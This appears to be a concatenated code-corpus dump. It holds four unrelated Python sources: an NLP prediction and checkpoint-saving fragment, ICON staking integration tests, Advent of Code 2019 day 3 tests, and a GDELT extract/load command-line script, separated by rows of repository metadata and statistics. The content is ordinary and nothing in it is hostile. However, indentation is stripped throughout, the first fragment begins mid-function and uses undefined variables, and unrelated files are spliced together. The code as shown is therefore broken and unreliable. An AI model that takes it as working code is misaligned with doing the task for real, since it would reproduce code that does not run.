logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Evaluation')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step, info="")
preds = np.argmax(preds, axis=1)
recall_labels = np.array(recall_labels['recall_label'])
cdn_commit_prediction(orig_texts, cls_preds, preds, recall_labels, recall_scores,
args.result_output_dir, self.data_processor.id2label)
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving model checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels_num)
if not os.path.exists(os.path.join(self.args.output_dir, 'num')):
os.mkdir(os.path.join(self.args.output_dir, 'num'))
if self.args.model_type == 'zen':
save_zen_model(os.path.join(self.args.output_dir, 'num'), model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(os.path.join(self.args.output_dir, 'num'))
torch.save(self.args, os.path.join(os.path.join(self.args.output_dir, 'num'), 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=os.path.join(self.args.output_dir, 'num'))
self.logger.info('Saving model checkpoint to %s', os.path.join(self.args.output_dir, 'num'))
| 46.253
| 166
| 0.572578
| 11,072
| 96,345
| 4.705022
| 0.026824
| 0.071409
| 0.043959
| 0.070334
| 0.900718
| 0.8849
| 0.87369
| 0.863055
| 0.852766
| 0.841095
| 0
| 0.006385
| 0.322082
| 96,345
| 2,082
| 167
| 46.275216
| 0.791209
| 0.004775
| 0
| 0.838821
| 0
| 0
| 0.079482
| 0.009492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040439
| false
| 0.001733
| 0.006355
| 0.001155
| 0.070479
| 0.000578
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fba203c9a5649d703fa3d565aa12bfb8da0bdbb2
| 26,655
|
py
|
Python
|
tests/integrate_test/iiss/prevote/test_iiss_stake.py
|
bayeshack2016/icon-service
|
36cab484d2e41548d7f2f74526f127ee3a4423fc
|
[
"Apache-2.0"
] | 52
|
2018-08-24T02:28:43.000Z
|
2021-07-06T04:44:22.000Z
|
tests/integrate_test/iiss/prevote/test_iiss_stake.py
|
bayeshack2016/icon-service
|
36cab484d2e41548d7f2f74526f127ee3a4423fc
|
[
"Apache-2.0"
] | 62
|
2018-09-17T06:59:16.000Z
|
2021-12-15T06:02:51.000Z
|
tests/integrate_test/iiss/prevote/test_iiss_stake.py
|
bayeshack2016/icon-service
|
36cab484d2e41548d7f2f74526f127ee3a4423fc
|
[
"Apache-2.0"
] | 35
|
2018-09-14T02:42:10.000Z
|
2022-02-05T10:34:46.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""IconScoreEngine testcase
"""
from typing import TYPE_CHECKING, List
from unittest.mock import patch
from iconservice import SYSTEM_SCORE_ADDRESS
from iconservice.icon_constant import Revision, ICX_IN_LOOP
from tests.integrate_test.iiss.test_iiss_base import TestIISSBase
if TYPE_CHECKING:
from iconservice.iconscore.icon_score_result import TransactionResult
class TestIISSStake(TestIISSBase):
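# Integration tests for ICX staking/unstaking: full stake, repeated stake and
# unstake requests, multiple-unstake slots, and migration of unstake data
# across the IISS / MULTIPLE_UNSTAKE revisions.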
def test_full_stake(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# transfer 100 icx to self.addr_array[0]
balance: int = 100 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
# estimate
tx: dict = self.create_set_stake_tx(self._accounts[0], balance)
estimate_step: int = self.estimate_step(tx)
# compute the estimated fee
step_price: int = self.get_step_price()
estimate_fee: int = step_price * estimate_step
# set full stake
stake: int = balance
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake,
expected_status=False)
balance -= tx_results[0].step_used * tx_results[0].step_price
# set full stake - estimated_fee
stake: int = balance - estimate_fee
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
def test_iiss_stake(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 1000 icx
balance: int = 1000 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
# set stake 50 icx
stake: int = 50 * ICX_IN_LOOP
unstake: int = 0
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 100 icx
stake: int = 100 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake,
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 50 icx again
stake: int = 50 * ICX_IN_LOOP
unstake: int = 50 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
estimate_unstake_lock_period_response: dict = self.estimate_unstake_lock_period()
expected_response = {
"stake": stake,
"unstake": unstake
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
self.assertEqual(estimate_unstake_lock_period_response["unstakeLockPeriod"],
actual_response["remainingBlocks"])
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 100 icx again
stake: int = 100 * ICX_IN_LOOP
unstake: int = 0 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 50 icx again
stake: int = 50 * ICX_IN_LOOP
unstake: int = 50 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
estimate_unstake_lock_period_response: dict = self.estimate_unstake_lock_period()
expected_response = {
"stake": stake,
"unstake": unstake
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
self.assertEqual(estimate_unstake_lock_period_response["unstakeLockPeriod"],
actual_response["remainingBlocks"])
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 150 icx
stake: int = 150 * ICX_IN_LOOP
unstake: int = 0 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 50 icx
stake: int = 50 * ICX_IN_LOOP
unstake: int = 100 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
estimate_unstake_lock_period_response: dict = self.estimate_unstake_lock_period()
expected_response = {
"stake": stake,
"unstake": unstake
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
self.assertEqual(estimate_unstake_lock_period_response["unstakeLockPeriod"],
actual_response["remainingBlocks"])
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 0 icx
stake: int = 0 * ICX_IN_LOOP
unstake: int = 150 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake,
"unstake": unstake,
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
expired_block_height: int = actual_response['unstakeBlockHeight']
self.make_blocks(expired_block_height + 1)
# after unstake_lock_period
remain_balance: int = balance
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# update icx balance
# estimate
tx: dict = self.create_transfer_icx_tx(from_=self._accounts[0],
to_=self._admin,
value=0)
estimate_step: int = self.estimate_step(tx)
# compute the estimated transfer fee
step_price: int = self.get_step_price()
estimate_fee: int = step_price * estimate_step
tx = self.create_transfer_icx_tx(self._accounts[0],
self._admin,
balance - estimate_fee,
step_limit=estimate_step)
self.process_confirm_block_tx([tx])
# get balance
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": 0
}
self.assertEqual(expected_response, actual_response)
def test_unstake(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 10 icx
balance: int = 10 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
# set stake
stake: int = 8 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
# test scenario 1
total_stake: int = 8
for i in range(0, total_stake // 2):
# stake reset
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP)
# delegation
delegation_amount: int = (total_stake - i) * ICX_IN_LOOP
delegations: list = [(self._accounts[0], delegation_amount)]
self.set_delegation(from_=self._accounts[0],
origin_delegations=delegations)
# stake
self.set_stake(from_=self._accounts[0],
value=i * ICX_IN_LOOP,
expected_status=False)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
# test scenario 2
for i in range(total_stake // 2 + 1, total_stake + 1):
# stake reset
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP)
# delegation
delegation_amount: int = (total_stake - i) * ICX_IN_LOOP
delegations: list = [(self._accounts[0], delegation_amount)]
self.set_delegation(from_=self._accounts[0],
origin_delegations=delegations)
# stake
self.set_stake(from_=self._accounts[0],
value=i * ICX_IN_LOOP)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
# test scenario 3
# stake reset
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP)
# delegation
delegation_amount: int = total_stake * ICX_IN_LOOP - 1
delegations: list = [(self._accounts[0], delegation_amount)]
self.set_delegation(from_=self._accounts[0],
origin_delegations=delegations)
# unstake 1 loop
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP - 1)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
# Fail
# unstake 2 loop
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP - 2,
expected_status=False)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
@patch("iconservice.iconscore.icon_score_context.IconScoreContext.unstake_slot_max", 10)
def test_multiple_unstake(self):
# in integration tests the unstaking period is about 20 blocks, so unstake_slot_max is patched down to 10
unstake_slot_max = 10
self.update_governance()
# set Revision REV_MULTIPLE_UNSTAKE
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# gain unstake_slot_max * 2 icx (20 icx)
balance: int = unstake_slot_max * 2 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1], init_balance=balance)
# set stake
stake: int = unstake_slot_max * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
# unstake 10
unstake_list = []
unstake = stake // unstake_slot_max // 2
for i in range(unstake_slot_max):
total_unstake = unstake * (i + 1)
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
unstake_list.append(unstake)
response: dict = self.get_stake(self._accounts[0])
for i in range(unstake_slot_max):
unstake_response = response["unstakes"][i]["unstake"]
self.assertEqual(unstake_list[i], unstake_response)
# increase unstake in last slot
total_unstake = sum(unstake_list) + ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
last_slot_block_height = response["unstakes"][unstake_slot_max-1]["unstakeBlockHeight"]
original_unstake = unstake_list.pop()
unstake_list.append(original_unstake + ICX_IN_LOOP)
last_slot_block_height2 = response["unstakes"][unstake_slot_max-1]["unstakeBlockHeight"]
for i in range(len(unstake_list)):
self.assertEqual(unstake_list[i], response["unstakes"][i]["unstake"])
# unstakeBlockHeight in last slot will be updated
self.assertGreaterEqual(last_slot_block_height2, last_slot_block_height)
# decrease slots
total_unstake = sum(unstake_list[:3])
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
response: dict = self.get_stake(self._accounts[0])
expected_unstakes = [unstake, unstake, unstake]
for i in range(len(expected_unstakes)):
self.assertEqual(expected_unstakes[i], response["unstakes"][i]["unstake"])
def test_migrate_unstake_data(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 1000 icx
balance: int = 1000 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1], init_balance=balance)
# set stake
stake: int = 100 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
# unstake 10
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
unstake_info = response
unstake_block_height = unstake_info["unstakeBlockHeight"]
# unstake 10 again and unstakeBlockHeight will be changed in rev IISS
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
unstake_info = response
unstake_block_height2 = unstake_info["unstakeBlockHeight"]
self.assertGreaterEqual(unstake_block_height2, unstake_block_height)
# set Revision REV_MULTIPLE_UNSTAKE
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake 10 again and unstakeBlockHeight will not be changed
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
unstake_info = response["unstakes"][0]
unstake_block_height3 = unstake_info["unstakeBlockHeight"]
self.assertEqual(unstake_block_height2, unstake_block_height3)
# unstake 20 to add another entry to the unstake list
unstake = 20 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
response: dict = self.get_stake(self._accounts[0])
self.assertEqual(2, len(response['unstakes']))
for unstake_info in response["unstakes"]:
self.assertEqual(10 * ICX_IN_LOOP, unstake_info['unstake'])
def test_update_unstake_block_height(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 1000 icx
balance: int = 1000 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1], init_balance=balance)
# set stake
stake: int = 100 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
# unstake 10
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
self.assertEqual(response["unstake"], unstake)
# set stake 120 icx and unstake info will be removed
new_stake = 120 * ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=new_stake)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2 - (new_stake - stake)
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
self.assertNotIn("unstakes", response)
# set Revision REV_MULTIPLE_UNSTAKE
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake 10
unstake = 10 * ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=new_stake-unstake)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
self.assertEqual(response["unstakes"][0]["unstake"], unstake)
# set stake 140 icx and unstake info will be removed
new_stake2 = 140 * ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=new_stake2)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2 - (new_stake2 - new_stake)
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
response: dict = self.get_stake(self._accounts[0])
self.assertNotIn("unstakes", response)
def test_stake_with_value_should_raise_exception(self):
self.update_governance()
self.set_revision(Revision.IISS.value)
balance: int = 10 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
tx: dict = self.create_score_call_tx(from_=self._accounts[0],
to_=SYSTEM_SCORE_ADDRESS,
func_name='setStake',
params={"value": hex(8 * ICX_IN_LOOP)},
value=5)
return self.process_confirm_block_tx([tx], expected_status=False)
| 43.768473
| 118
| 0.624461
| 3,052
| 26,655
| 5.166448
| 0.073067
| 0.074581
| 0.075025
| 0.044394
| 0.829274
| 0.808346
| 0.785134
| 0.775178
| 0.768645
| 0.768138
| 0
| 0.018462
| 0.284712
| 26,655
| 608
| 119
| 43.840461
| 0.80856
| 0.078747
| 0
| 0.755924
| 0
| 0
| 0.046243
| 0.003026
| 0
| 0
| 0
| 0
| 0.14455
| 1
| 0.016588
| false
| 0
| 0.014218
| 0
| 0.035545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fba4276d22a96a19de78a0042951c4a04ac5f7ea
| 1,467
|
py
|
Python
|
AdventOfCode2019Day03/test/test_day03.py
|
bdlepla/AdventOfCode2019
|
27a8289bae8510f8af457658b2fa10d5345f9426
|
[
"Unlicense"
] | null | null | null |
AdventOfCode2019Day03/test/test_day03.py
|
bdlepla/AdventOfCode2019
|
27a8289bae8510f8af457658b2fa10d5345f9426
|
[
"Unlicense"
] | null | null | null |
AdventOfCode2019Day03/test/test_day03.py
|
bdlepla/AdventOfCode2019
|
27a8289bae8510f8af457658b2fa10d5345f9426
|
[
"Unlicense"
] | null | null | null |
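# Tests for Advent of Code 2019, day 3 ("Crossed Wires"): each case feeds two
# comma-separated wire paths to Day03 and checks the expected result for
# part 1 (closest intersection distance) and part 2 (fewest combined steps).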
def test_solve_part_1():
import day03
raw_lines = """
R8,U5,L5,D3
U7,R6,D4,L4
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_1()
expected = 6
assert expected == actual
def test_solve_part_1a():
import day03
raw_lines = """
R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51
U98,R91,D20,R16,D67,R40,U7,R15,U6,R7
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_1()
expected = 135
assert expected == actual
def test_solve_part_2():
import day03
raw_lines = """
R8,U5,L5,D3
U7,R6,D4,L4
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_2()
expected = 30
assert expected == actual
def test_solve_part_2a():
import day03
raw_lines = """
R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51
U98,R91,D20,R16,D67,R40,U7,R15,U6,R7
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_2()
expected = 410
assert expected == actual
| 28.764706
| 55
| 0.620995
| 218
| 1,467
| 4.013761
| 0.252294
| 0.082286
| 0.054857
| 0.073143
| 0.941714
| 0.941714
| 0.941714
| 0.818286
| 0.818286
| 0.818286
| 0
| 0.134222
| 0.233129
| 1,467
| 51
| 56
| 28.764706
| 0.643556
| 0
| 0
| 0.833333
| 0
| 0.041667
| 0.205722
| 0.107629
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbc27064c5b1571af1925f1b23fe88e0ccfe8c87
| 3,314
|
py
|
Python
|
manage.py
|
volod/gdelt20utils
|
4fdcc1803d4ef300d4d30857752faa1c9dcb63d0
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
volod/gdelt20utils
|
4fdcc1803d4ef300d4d30857752faa1c9dcb63d0
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
volod/gdelt20utils
|
4fdcc1803d4ef300d4d30857752faa1c9dcb63d0
|
[
"Apache-2.0"
] | null | null | null |
import click
from gdelt20utils.common import constants
from gdelt20utils.common.gd_config import config
from gdelt20utils.extract.run import run_extract
from gdelt20utils.load.run import run_load
@click.group(help="Extract")
@click.pass_context
def cli(ctx):
ctx.obj.update(config)
@cli.command("extract", help="Extract gdelt20 data")
@click.option("--base_path", "-b",
type=click.Path(),
required=True,
default=constants.DEFAULT_DATA_PATH,
help="gdelt20 data target path")
@click.option("--start_date", "-d",
type=click.DateTime(),
required=True,
help="gdelt20 data set start day")
@click.option("--finish_date", "-n",
type=click.DateTime(),
required=True,
help="gdelt20 data set finish date")
@click.option("--languages", "-l",
type=click.Choice(constants.GDELT_LANGUAGE, case_sensitive=True),
required=True,
default=constants.GDELT_LANGUAGE,
multiple=True,
help="gdelt20 data set language corpus")
@click.option("--object_types", "-o",
type=click.Choice(constants.GDELT_OBJ_TYPE, case_sensitive=True),
required=True,
default=constants.GDELT_OBJ_TYPE,
multiple=True,
help="gdelt20 data set object type to load")
@click.pass_obj
def extract(config_obj, base_path, start_date, finish_date, languages, object_types):
run_extract(
config_obj,
base_path,
start_date,
finish_date,
languages,
object_types
)
@cli.command("load", help="load gdelt20 data")
@click.option("--base_path", "-b",
type=click.Path(),
required=True,
default=constants.DEFAULT_DATA_PATH,
help="gdelt20 data source path")
@click.option("--target_service", "-s",
required=True,
default=constants.TARGET_SERVISES[0],
help="gdelt20 data source path")
@click.option("--start_date", "-d",
type=click.DateTime(),
required=True,
help="gdelt20 data set start day")
@click.option("--finish_date", "-n",
type=click.DateTime(),
required=True,
help="gdelt20 data set finish date")
@click.option("--languages", "-l",
type=click.Choice(constants.GDELT_LANGUAGE, case_sensitive=True),
required=True,
default=constants.GDELT_LANGUAGE,
multiple=True,
help="gdelt20 data set language corpus")
@click.option("--object_types", "-o",
type=click.Choice(constants.GDELT_OBJ_TYPE, case_sensitive=True),
required=True,
default=constants.GDELT_OBJ_TYPE,
multiple=True,
help="gdelt20 data set object type to load")
@click.pass_obj
def load(config_obj, base_path, target_service, start_date, finish_date, languages, object_types):
# TODO: implement extraction into targets directly from api
run_load(
config_obj,
base_path,
target_service,
start_date,
finish_date,
languages,
object_types
)
if __name__ == "__main__":
cli(obj={})
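# Example invocations (hypothetical paths and placeholder values, shown only for illustration):
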